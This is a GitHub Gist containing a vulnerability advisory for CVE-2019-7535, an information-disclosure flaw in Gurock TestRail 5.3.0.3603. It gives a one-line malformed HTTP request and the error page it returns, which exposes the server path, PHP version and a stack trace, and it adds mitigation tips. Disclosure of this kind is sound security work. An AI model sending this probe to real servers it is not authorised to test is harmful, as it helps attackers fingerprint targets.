Last active
February 9, 2019 11:53
-
-
Save nenf/2f16cd547c2afe166d1cb3f88f18bf81 to your computer and use it in GitHub Desktop.
CVE-2019-7535
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Description] | |
| Gurock TestRail 5.3.0.3603 returns potentially sensitive information for an invalid request, as | |
| demonstrated by full path disclosure and the identification of PHP as the backend technology. | |
| ------------------------------------------ | |
| [Additional Information] | |
| * Make sure that your web server does not send out response that | |
| reveal information about the backend technology type or version. | |
| * Make sure that your web application processes user input correctly, | |
| and that a generic response is always returned for all the | |
| resources that don't exist/are disallowed in order to confuse | |
| attackers. | |
| ------------------------------------------ | |
| [VulnerabilityType Other] | |
| Information Disclosure | |
| ------------------------------------------ | |
| [Vendor of Product] | |
| Gurock | |
| ------------------------------------------ | |
| [Affected Product Code Base] | |
| TestRail - 5.3.0.3603 | |
| ------------------------------------------ | |
| [Affected Component] | |
| affected sys/core/uri.php script | |
| ------------------------------------------ | |
| [Attack Type] | |
| Remote | |
| ------------------------------------------ | |
| [Impact Information Disclosure] | |
| true | |
| ------------------------------------------ | |
| [Attack Vectors] | |
| Example: | |
| ``` | |
| GET /index.php?%F0%9F%92%A9 HTTP/1.1 | |
| Host: testrail | |
| ``` | |
| In html source code: | |
| ``` | |
| Details: <missing> | |
| File: /var/www/testrail/sys/core/uri.php | |
| Line: 88 | |
| Status Code: 500 | |
| Host: testrail | |
| Uri: /index.php?%F0%9F%92%A9 (GET) | |
| Browser: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0 | |
| PHP: 5.3.3 | |
| Server: Linux 2.6.32-042stab120.3 #1 SMP Thu Oct 20 18:18:21 MSK 2016 x86_64 | |
| Trace: | |
| at Uri_core::_parse (uri.php:88) | |
| at Uri_core->_parse (uri.php:22) | |
| at Uri_core->init (services.php:90) | |
| at ServicesImpl->_create (services.php:59) | |
| at ServicesImpl->get (services.php:77) | |
| at ServicesImpl->_create (services.php:59) | |
| at ServicesImpl->get (services.php:27) | |
| at Services::get (gizmo.php:72) | |
| at require_once (index.php:106) | |
| Version: 5.3.0.3603" | |
| ``` | |
| ------------------------------------------ | |
| [Reference] | |
| https://www.gurock.com/testrail |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment